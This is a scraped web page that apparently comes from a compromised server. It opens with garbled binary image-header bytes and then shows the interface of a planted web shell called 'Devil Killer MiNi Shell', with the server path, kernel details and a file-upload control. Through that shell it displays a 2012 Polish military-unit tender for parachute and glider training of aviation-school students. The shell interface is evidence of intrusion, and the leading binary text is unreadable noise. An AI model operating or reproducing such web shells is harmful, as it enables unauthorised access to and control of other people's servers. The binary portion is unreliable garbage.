JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120514/106721-N-2012.html

<p class="kh_header"><b>Dęblin: Przeprowadzenie szkolenia lotniczego dla uczniów Ogólnokształcącego Liceum Lotniczego, Nr 20/12/N.</b><br>
<b>Numer ogłoszenia: 106721 - 2012; data zamieszczenia: 14.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4219 , 08-521 Dęblin, woj. lubelskie, tel. 0-81 5519510, 5517818, faks 0-81 5519536.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkolenia lotniczego dla uczniów Ogólnokształcącego Liceum Lotniczego, Nr 20/12/N..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Grupa I
1. Wykonawca zobowiązuje się do przeprowadzenia szkolenia spadochronowego podstawowego, dla ok. 48 uczniów Ogólnokształcącego Liceum Lotniczego, po ukończeniu przez nich I klasy liceum, zgodnie z programem szkolenia spadochronowego, zatwierdzonym przez Prezesa Urzędu Lotnictwa Cywilnego do świadectwa kwalifikacji skoczka spadochronowego, składającego się z :
1)szkolenia teoretycznego - w wymiarze 20 godzin, kończącego się wewnętrznym egzaminem w ośrodku szkolenia lotniczego oraz wydaniem zaświadczenia o ukończeniu szkolenia spadochronowego : teoria (teoretyczny kurs spadochronowy), uprawniającego do szkolenia praktycznego;
2)szkolenia praktycznego - obejmującego 5 skoków ze spadochronem.
Grupa II
1.Wykonawca zobowiązuje się do przeprowadzenia szkolenia szybowcowego (Grupa II), podstawowego, dla ok. 56 uczniów, po ukończeniu przez nich II klasy Ogólnokształcącego Liceum Lotniczego, zgodnie z programem szkolenia, zatwierdzonym przez Prezesa Urzędu Lotnictwa Cywilnego do licencji pilota szybowcowego PL (G), składającego się z :
1)szkolenia teoretycznego - w wymiarze 60 godzin, kończącego się wewnętrznym egzaminem w ośrodku szkolenia lotniczego oraz wydaniem zaświadczenia o ukończeniu szkolenia lotniczego : teoria (teoretyczny kurs szybowcowy), uprawniającego do szkolenia praktycznego;
2)szkolenia praktycznego - podstawowego, przeznaczonego do uzyskania III klasy pilota szybowcowego, przeprowadzanego na holu za samolotem (zadanie A/II)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.41.20.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że posiada certyfikat wydany przez Prezesa Urzędu Lotnictwa Cywilnego uprawniający go do wykonywania teoretycznych i praktycznych szkoleń spadochronowych (w przypadku Grupy I) i/lub szybowcowych (w przypadku Grupy II). Ponadto w przypadku Grupy I Wykonawca musi wykazać, że instruktorzy szkolenia spadochronowego posiadają wydane przez Prezesa Urzędu Lotnictwa Cywilnego  licencje instruktora spadochronowego lub skoczka z uprawnieniami instruktora. W przypadku Grupy II Wykonawca musi wykazać, że instruktorzy szkolenia szybowcowego posiadają wydane przez Prezesa Urzędu Lotnictwa Cywilnego licencje pilota szybowcowego z uprawnieniami instruktora.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał przynajmniej 1 usługę w zakresie selekcyjnego szkolenia lotniczego dla potrzeb Sił Zbrojnych RP, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że szkolenia zostały wykonane prawidłowo (np. referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas wykonania przedmiotu zamówienia dysponuje: w przypadku Grupy I - lotniskiem/lądowiskiem, spadochronami i samolotami; w przypadku Grupy II - lotniskiem, szybowcami, samolotem holującym, wyciągarką, spadochronami ratowniczymi, radiostacjami, samochodem terenowym (jako ściągarką).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oOcena spełniania przez wykonawców ww warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonego oświadczenia w trybie art.22 ust.1 pzp (załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oOcena spełniania przez wykonawców ww warunku dokonana będzie zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonego oświadczenia w trybie art.22 ust.1 pzp (załącznik nr 2 do siwz)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli wykonawca polega na wiedzy, doświadczeniu, potencjale technicznym, osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, na zasadach określonych w art. 26 ust. 2 b ustawy, to w takim przypadku Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji niniejszego zamówienia, przedstawiając w tym celu w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy realizacji zamówienia, podpisane przez osoby upoważnione do reprezentacji tych podmiotów 2. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w części III. 4.3.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Termin ważności dokumentów zawierających oświadczenie stosuje się odpowiednio jak wyżej.
3. oświadczenie Wykonawcy, że posiada certyfikat wydany przez Prezesa Urzędu Lotnictwa Cywilnego uprawniający go do wykonywania teoretycznych i praktycznych szkoleń spadochronowych (w przypadku Grupy I) i/ lub szybowcowych (w przypadku Grupy II) - Załącznik nr 4 do siwz
4. oświadczenie Wykonawcy, że instruktorzy szkolenia w przypadku Grupy I - spadochronowego posiadają wydane przez Prezesa Urzędu Lotnictwa Cywilnego licencje instruktora spadochronowego lub skoczka z uprawnieniami instruktora - Załącznik Nr 5a do siwz,  a w przypadku Grupy II  - szybowcowego - posiadają wydane przez Prezesa Urzędu Lotnictwa Cywilnego licencje pilota szybowcowego z uprawnieniami instruktora.- Załącznik Nr 5b do siwz;
5. oświadczenie Wykonawcy, że na czas wykonania przedmiotu zamówienia dysponuje odpowiednim potencjałem technicznym: w przypadku Grupy I - lotniskiem/lądowiskiem, spadochronami i samolotami; w przypadku Grupy II - lotniskiem, szybowcami, samolotem holującym, wyciągarką, spadochronami ratowniczymi, radiostacjami, samochodem terenowym (jako ściągarka)- Załącznik Nr 7 do siwz</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszcza się dokonanie zmiany terminu szkolenia praktycznego spadochronowego oraz szybowcowego, jeżeli z przyczyn od stron umowy niezależnych oraz niemożliwych do wcześniejszego przewidzenia (np. niekorzystne warunki atmosferyczne uniemożliwiające wykonywanie lotów szybowcowych i skoków spadochronowych), niemożliwe było przeprowadzenie szkolenia praktycznego w pierwotnym terminie.  
2. Zamawiający dopuszcza możliwość zmiany osób odpowiedzialnych za realizację umowy, jeżeli zajdzie taka potrzeba - w przypadku rozwiązania lub wygaśnięcia stosunku pracy z daną osobą lub zdarzenia losowego, choroby  uniemożliwiającej pełnienie powierzonych jej obowiązków.
3. Zamawiający zastrzega sobie możliwość zmniejszenia liczby uczniów biorących udział w szkoleniu w wyniku okoliczności losowych, które pomimo zachowania należytej staranności, były niemożliwe do przewidzenia (np. nieuzyskanie promocji do następnej klasy, choroba lub kontuzja ucznia uniemożliwiająca wzięcie udziału w szkoleniu).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa Nr 4219, Lotnisko, bud. 205, pokój nr 3, 08-521 Dęblin lub pocztą po wpłacie 16,00 zł na konto 15101013390000972231000000. Pisemną prośbę należy przesłać łącznie z dowodem wpłaty..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2012 godzina 12:00, miejsce: Kancelaria Jawna (pokój nr 20) Jednostki Wojskowej Nr 4219, Lotnisko, budynek 205, 08-521 Dęblin..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie spadochronowe podstawowe (teoretyczne i praktyczne)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa I
1. Wykonawca zobowiązuje się do przeprowadzenia szkolenia spadochronowego podstawowego, dla ok. 48 uczniów Ogólnokształcącego Liceum Lotniczego, po ukończeniu przez nich I klasy liceum, zgodnie z programem szkolenia spadochronowego, zatwierdzonym przez Prezesa Urzędu Lotnictwa Cywilnego do świadectwa kwalifikacji skoczka spadochronowego, składającego się z :
1)	szkolenia teoretycznego - w wymiarze 20 godzin, kończącego się wewnętrznym egzaminem w ośrodku szkolenia lotniczego oraz wydaniem zaświadczenia o ukończeniu szkolenia spadochronowego : teoria (teoretyczny kurs spadochronowy), uprawniającego do szkolenia praktycznego;
2)	szkolenia praktycznego - obejmującego 5 skoków ze spadochronem.
2.	Preferowane wymagania dodatkowe:
a)	szkolenie teoretyczne realizowane w salach wykładowych OLL w Dęblinie przez jeden aeroklub;
b)	szkolenie praktyczne realizowane w siedzibie aeroklubu (dopuszcza się transport własny aeroklubu do 100km);
c)	podczas szkolenia - zabezpieczenie przez aeroklub całodobowej opieki wychowawczej nad młodzieżą;
d)	ubezpieczenie NNW uczniów przez aeroklub;
e)	poniesienie kosztów przez aeroklub wydanych orzeczeń lotniczo-lekarskich zgodnie 
z JAR - RCL 3 (lub równorzędne);
f)	inne zabezpieczenia wymagane przez nadzór lotniczy
3.Wykonawca przygotuje i dostarczy Zamawiającemu zaświadczenia o ukończeniu kursu 
i certyfikat potwierdzający uzyskane uprawnienia dla każdego z beneficjentów, do dnia 15 września 2012r dla wszystkich uczestników szkolenia jednocześnie.
4.Wykonawca zobowiązuje się do:
systematycznego prowadzenia dokumentacji w postaci: list obecności, dzienników zajęć i protokołów egzaminacyjnych i książek przebiegu szkolenia spadochronowego uczestników kursu,
ścisłej współpracy z Zamawiającym,
 udzielania informacji o stanie realizacji przedmiotu umowy na wniosek Zamawiającego,
umożliwienia kontroli przebiegu szkolenia przez Zamawiającego,
przestrzegania zasady równości szans, w tym równości płci w czasie prowadzenia szkolenia, w ramach realizacji przedmiotu umowy,
przygotowania informacji po zakończeniu szkolenia teoretycznego oraz szkolenia praktycznego każdej grupy szkoleniowej, który będzie zawierał w szczególności:
a)   imienne wskazanie uczestników szkolenia wraz z liczbą wykonanych skoków,
b) omówienie trudności, z jakimi spotkał się Wykonawca przy realizacji umowy 
      w odniesieniu również do każdego uczestnika szkolenia,
       c)   uwagi zgłoszone przez uczestników szkolenia, co do treści szkolenia,
5. Wymagania dodatkowe stawiane Wykonawcy:
1) należyta staranność przy realizacji umowy,
2) zdobycie wszelkich informacji niezbędnych do prawidłowego przygotowanie oferty,
3) sprawdzenie i zweryfikowanie dostarczonych materiałów,
4) niezwłoczne informowanie Zamawiającego o ewentualnych błędach lub przeoczeniach.
6. Podczas szkolenia praktycznego, w powietrzu i na płycie lotniska Wykonawca odpowiada za bezpieczeństwo uczestników szkolenia.
7. Dowóz z miejsca zakwaterowania na pas startowy lotniska/ lądowiska na koszt Wykonawcy.
8. Realizację tego zadania powinien wykonywać aeroklub posiadający doświadczenie 
w zakresie selekcyjnego szkolenia lotniczego dla potrzeb MON.
9. Zgodnie ze Statutem Ogólnokształcącego Liceum Lotniczego im. Żwirki i Wigury 
w Dęblinie, uczniowi OLL, który uczestniczy w szkoleniu lotniczym podczas wakacji przysługuje całodzienne wyżywienie, zakwaterowanie w zakresie i na zasadach określonych dla żołnierzy pełniących służbę wojskową w charakterze kandydatów na żołnierzy zawodowych. Jeżeli aeroklub szkolący uczniów będzie znajdował się w odległości powyżej 100 km od Ogólnokształcącego Liceum Lotniczego w Dęblinie w trakcie szkolenia praktycznego zakwaterowanie i wyżywienie na koszt aeroklubu realizującego szkolenie lub w przypadku, gdy aeroklub znajduje się w odległości do 100km od OLL dowóz uczniów do aeroklubu.
10. Szkolenie teoretyczne odbędzie się w ciągu ok. 2 dni w salach wykładowych OLL - przed terminem rozpoczęcia szkolenia praktycznego.
11. Szkolenie praktyczne powinno odbyć się w 3 grupach, czyli po 16 osób w grupie. Czas trwania szkolenia praktycznego to ok. 5 dni na poszczególną grupę (w przypadku sprzyjających warunków atmosferycznych). W innym przypadku ok. 6 dni. 
12. W przypadku gdy aeroklub znajduje się w odległości powyżej 100 km od OLL Wykonawca zobowiązuje się zapewnić całodzienne wyżywienie, według poniższych wymagań:
- posiłek całodzienny: ok. 4288 kcal 
   białko - 146 g, w tym białko zwierzęce - 80 g,
   tłuszcze - 142 g, w tym roślinne - 46 g,
   węglowodany - 605 g,
   wapń - 1350 mg,
   żelazo - 32 mg,
   magnez - 66 mg,
   witamina A - 1299 mg,
   witamina C - 185 mg.
składające się z następujących posiłków:
a)	śniadanie zawierające danie gorące, zimny bufet, dodatki: miód, dżem, masło pieczywo (bułki, różne gatunki chleba) itp. oraz napoje ciepłe: kawa, herbata,
b)	obiad składający się z dwóch dań (zupa, danie główne z dodatkami i surówkami) 
i napoju,
c)	kolacja zawierająca danie gorące i zimny bufet.
14. Zestawy obiadowe mogą się powtórzyć nie częściej niż  jeden raz w tygodniu. Godziny posiłków zostaną uzgodnione z Zamawiającym. Jeżeli temperatura powietrza planowana na następny dzień szkoleniowy będzie wynosić powyżej 25°C  Wykonawca zapewni zimne napoje zaspokajające potrzeby osób szkolonych.
15. W przypadku, gdy aeroklub znajduje się w odległości powyżej 100km od OLL Wykonawca jest zobowiązany zapewnić uczestnikom szkolenia i opiekunom zakwaterowanie w obiekcie spełniającym, co najmniej wymagania dla schroniska młodzieżowego kategorii pierwszej określone w Rozporządzeniu Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (tekst jednolity: Dz.U. z dnia 10.02.2006r., nr 22, poz. 169, załącznik 5) z późn. zm. Dla opiekuna grupy musi być zapewniony samodzielny pokój.
16. Zamawiający zastrzega sobie możliwość zmniejszenia liczy uczestników szkolenia spadochronowego z przyczyn niezależnych od niego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.20.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie szybowcowe podstawowe (teoretyczne i praktyczne)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa II
1.	Wykonawca zobowiązuje się do przeprowadzenia szkolenia szybowcowego (Grupa II), podstawowego, dla ok. 56 uczniów, po ukończeniu przez nich II klasy Ogólnokształcącego Liceum Lotniczego, zgodnie z programem szkolenia, zatwierdzonym przez Prezesa Urzędu Lotnictwa Cywilnego do licencji pilota szybowcowego PL (G), składającego się z :
1)	szkolenia teoretycznego - w wymiarze 60 godzin, kończącego się wewnętrznym egzaminem w ośrodku szkolenia lotniczego oraz wydaniem zaświadczenia o ukończeniu szkolenia lotniczego : teoria (teoretyczny kurs szybowcowy), uprawniającego do szkolenia praktycznego;
2)	szkolenia praktycznego - podstawowego, przeznaczonego do uzyskania III klasy pilota szybowcowego, przeprowadzanego na holu za samolotem (zadanie A/II).

2.	Preferowane wymagania dodatkowe:
a)	szkolenie teoretyczne realizowane w salach wykładowych OLL w Dęblinie przez jeden aeroklub;
b)	szkolenie praktyczne dopuszczalne jest przez więcej niż jeden aeroklub, jednak nie mniej niż 20 uczniów na aeroklub;
c)	podczas szkolenia - zabezpieczenie przez aeroklub całodobowej opieki wychowawczej nad młodzieżą;
d)	ubezpieczenie NNW uczniów przez aeroklub;
e)	poniesienie kosztów przez aeroklub wydanych orzeczeń lotniczo-lekarskich zgodnie z JAR - FCL 3;
f)	inne zabezpieczenia wymagane przez nadzór lotniczy.
3.	Wykonawca przygotuje i dostarczy Zamawiającemu zaświadczenia o ukończeniu kursu i certyfikat potwierdzający uzyskane uprawnienia dla każdego z beneficjentów do dnia 15 września 2012r dla wszystkich uczestników szkolenia jednocześnie.
3.	4. Wykonawca zobowiązuje się do:
systematycznego prowadzenia dokumentacji w postaci: list obecności, dzienników zajęć i protokołów egzaminacyjnych i książek przebiegu szkolenia szybowcowego uczestników kursu,
